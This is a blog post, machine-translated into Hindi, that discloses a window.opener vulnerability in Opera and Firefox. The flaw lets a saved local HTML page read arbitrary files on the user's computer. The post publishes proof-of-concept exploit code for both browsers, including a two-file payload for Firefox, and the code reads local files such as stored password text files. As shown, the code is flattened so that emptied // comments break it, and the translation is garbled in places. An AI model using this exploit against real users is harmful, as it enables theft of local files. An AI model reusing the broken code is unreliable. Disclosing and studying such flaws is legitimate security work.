Window.opener के साथ सुरक्षा समस्या को खोदना और पीटना जारी रखते हुए, मैं फ़ायरफ़ॉक्स और ओपेरा ब्राउज़र में एक मज़ेदार भेद्यता के साथ आया।
भेद्यता आपके सिस्टम पर मनमाने फ़ाइलों को पढ़ने के लिए आपके कंप्यूटर पर संग्रहीत पृष्ठ की अनुमति देती है।



Window.opener के परिवर्तन पर अपर्याप्त नियंत्रण के कारण भेद्यता मौजूद है।
एक हमलावर एक पृष्ठ में मनमाने ढंग से HTML कोड एम्बेड कर सकता है और जब यह पृष्ठ स्थानीय सिस्टम पर लॉन्च किया जाता है, तो लगभग किसी भी फ़ाइल की सामग्री को पढ़ना संभव हो जाता है (निश्चित रूप से, यदि आपके पास विशेषाधिकार हैं)।

ओपेरा

चूंकि भेद्यता काफी सरल है, मैं तुरंत शोषण प्रकाशित करता हूं। Window.opener की समस्या यहां पाई जा सकती है ।

<html> <body> <script> 

 if((navigator.userAgent.indexOf("Opera") != -1) && (window.location.protocol == "file:")) { //     Opera       file var file=prompt("Example: C:/file.txt "); //   ? if(file){ console.log("File: "+file); document.write("<center>"+ "<a href='data:text/html,"+ // ,   data "<script>"+ "if(window.opener){"+ //  window.opener  "window.opener.location.replace(%22file://"+window.location.hostname+"/"+file+"%22);"+ //        "};%3C%2Fscript%3E"+ "%3Cscript%3E"+ //    script,    "alert(window.opener.document.body.innerHTML);"+ //   :) "%3C%2Fscript%3E"+ "' target='_blank'>"+ //target= _blank "CLICK-CLICK</a>"); }} 

 </script> </body> </html> 

इस भेद्यता को प्रदर्शित करने वाला वीडियो:

फ़ायरफ़ॉक्स

इस ब्राउज़र में भेद्यता समान है, लेकिन यहाँ शोषण करना अधिक कठिन है।

डेटा तक पूर्ण पहुंच के लिए, कोड को डिस्क की जड़ में रखा जाना चाहिए।
मैंने nix'ahs पर परीक्षण नहीं किया है और इसलिए, मैं nix'ahs में कोड व्यवहार के बारे में बात नहीं कर सकता।
यहां कोड में दो फाइलें हैं, जो ब्राउज़र में प्रतिबंधों को बायपास करने के लिए है।

फ़ाइल एक (Fir.html):

 <html> <body> <script> 

  if((navigator.userAgent.indexOf("Firefox") != -1) && (window.location.protocol == "file:")){ //     Firefox       file document.write("<center>"+ "<a href='./payload.html'"+ // payload.html " target='_blank'>CLICK-CLICK</a>"); //target=_blank }; 

  </script> </body> </html> 

दूसरी फ़ाइल (पेलोड। Html):

 <html> <body> <script> 

 var file=prompt('Example: C:/file.txt'); console.log(file); window.opener.location="file://localhost/"+file; 

 </script> <script> 

 var al=function(){alert(window.opener.document.body.innerHTML)}; //  while(!window.opener.document.body){ //window.opener.document.body=null alert('Click OK'); // al(); //  }; 

 </script> </body> </html> 

वीडियो:

निष्कर्ष

तथ्य यह है कि शोषण केवल काम कर सकता है जबकि लक्ष्य प्रणाली पर यह भेद्यता को महत्वपूर्ण नहीं बनाता है।
हालांकि, उन लोगों के लिए जो अपने कंप्यूटर पर पृष्ठों को सहेजना पसंद करते हैं, मैं आपको सावधानीपूर्वक संसाधनों का चयन करने के लिए कहता हूं :)

युपीडी
उन लोगों के लिए जो समझ नहीं सकते कि यह एक भेद्यता क्यों है।

मैं आपको एक उदाहरण देता हूं: आपने इंटरनेट पर एक दिलचस्प लेख पाया है और मान लीजिए कि आप प्रकृति में जा रहे हैं। कोई इंटरनेट नहीं है, लेकिन आप वास्तव में लेख पढ़ना चाहते हैं।
लेकिन आपने पहले ही अपने कंप्यूटर पर HTML डॉक्यूमेंट सेव कर लिया था। और अब आप आग से बैठे हैं, मच्छरों ने आपको काट लिया है और आपने इस दस्तावेज़ को पढ़ने का फैसला किया है। खैर, यह कहा है, किया! खोला, पढ़ा, भुलाया गया।
और दोपहर में आप घर लौटते हैं, और सामाजिक रूप से अपने खाते तक पहुंचते हैं। कोई नेटवर्क नहीं है। आखिरकार, आपने पास * .txt फ़ाइल में हार्ड ड्राइव पर अपना उपयोगकर्ता नाम और पासवर्ड छोड़ दिया।

इस भेद्यता को आलोचनात्मक नहीं माना जाना चाहिए। यह एक खिलौने से ज्यादा कुछ नहीं है।
लेकिन कभी-कभी, यहां तक ​​कि खिलौने भी शूट करते हैं;)

UPD2: निर्देशिकाओं को देखना संभव है, मैं शोषण की कल्पना नहीं कर सकता, क्योंकि यह अच्छा नहीं है।